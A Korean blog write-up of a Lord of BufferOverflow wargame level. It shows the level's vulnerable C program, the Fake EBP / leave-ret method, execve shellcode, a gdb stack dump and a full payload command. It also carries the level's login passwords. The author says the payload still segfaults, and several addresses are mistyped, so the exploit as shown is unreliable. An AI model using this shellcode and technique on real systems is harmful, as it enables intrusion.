login : assassin
pw : pushing me away
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
이전문제에서 strcpy -> strncpy로 바뀌었다.
Fake ebp를 이용하자
Fake EBP
Fake EBP란? Fake EBP는 EBP를 조작하여 leave-ret Gadget을 이용해 IP(Instruction Pointer)를 조작하는 공격 기법을 말한다. 이 기법은 주로 RET에 스택 주소와 라이브러리 주소를 덮어씌울 수 없을 때 사용한다..
d4m0n.tistory.com
페이로드는
&buf+4( 쉘코드 주소) (4) + shellcode(25) + nop(11) + &buf-4 (4) + leave-ret Gadget(4)
하나씩 구해보자
1. leave-ret 주소
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0x80484e1 <main+161>: nop
0x80484df
2. shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
3. &buf+4
(gdb) r `python -c 'print "a"*44'`
Starting program: /home/assassin/test `python -c 'print "a"*44'`
Breakpoint 1, 0x8048440 in main ()
(gdb) x/100x $esp
0xbffffb2c: 0x400309cb 0x00000002 0xbffffb74 0xbffffb80
0xbffffb3c: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffffb4c: 0x080483b1 0x08048440 0x00000002 0xbffffb74
0xbffffb5c: 0x080482e4 0x0804851c 0x4000ae60 0xbffffb6c
0xbffffb6c: 0x40013e90 0x00000002 0xbffffc5f 0xbffffc73
0xbffffb7c: 0x00000000 0xbffffca0 0xbffffcc2 0xbffffccc
0xbffffb8c: 0xbffffcda 0xbffffcf9 0xbffffd0a 0xbffffd23
0xbffffb9c: 0xbffffd41 0xbffffd4c 0xbffffd5a 0xbffffd9e
0xbffffbac: 0xbffffdb2 0xbffffdc7 0xbffffdd7 0xbffffde5
0xbffffbbc: 0xbffffe05 0xbffffe10 0xbffffe1d 0xbffffe25
0xbffffbcc: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbdc: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbec: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffbfc: 0x00000000 0x00000009 0x08048390 0x0000000b
0xbffffc0c: 0x00000203 0x0000000c 0x00000203 0x0000000d
0xbffffc1c: 0x00000203 0x0000000e 0x00000203 0x00000010
0xbffffc2c: 0x0f8bfbff 0x0000000f 0xbffffc5a 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffc5c: 0x2f003638 0x656d6f68 0x7373612f 0x69737361
0xbffffc6c: 0x65742f6e 0x61007473 0x61616161 0x61616161
0xbffffc7c: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc8c: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc9c: 0x00616161 0x5353454c 0x4e45504f 0x752f7c3d
buf + 4는
buf 시작주소가 0xbffffc74이니 + 4해준 0xbfffc78이고
4. &buf-4
0xbfffc70이다.
0xbfffc78 + \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
+\x90 * 11
+0xbfffc70
+0x80484df
./zombie_assassin `python -c 'print "\x78\xfc\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11+"\x70\xfc\xff\xbf"+"\xdf\x84\x04\x08"'`
계속 segmentation fault가 떠서 이문제는 나중에 다시 풀어야될것같다.
no place to hide
'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글
| [Lord Of BufferOverFlow] 18번 succubus -> Nightmare (0) | 2021.03.07 |
|---|---|
| [Lord Of BufferOverFlow] 17번 zombie_assassin -> succubus (0) | 2021.03.06 |
| [Lord Of BufferOverFlow] 15번 giant -> assassin (0) | 2021.03.04 |
| [Lord Of BufferOverFlow] 14번 bugbear -> giant (0) | 2021.03.04 |
| [Lord Of BufferOverFlow] 13번 darkknight -> bugbear (0) | 2021.03.01 |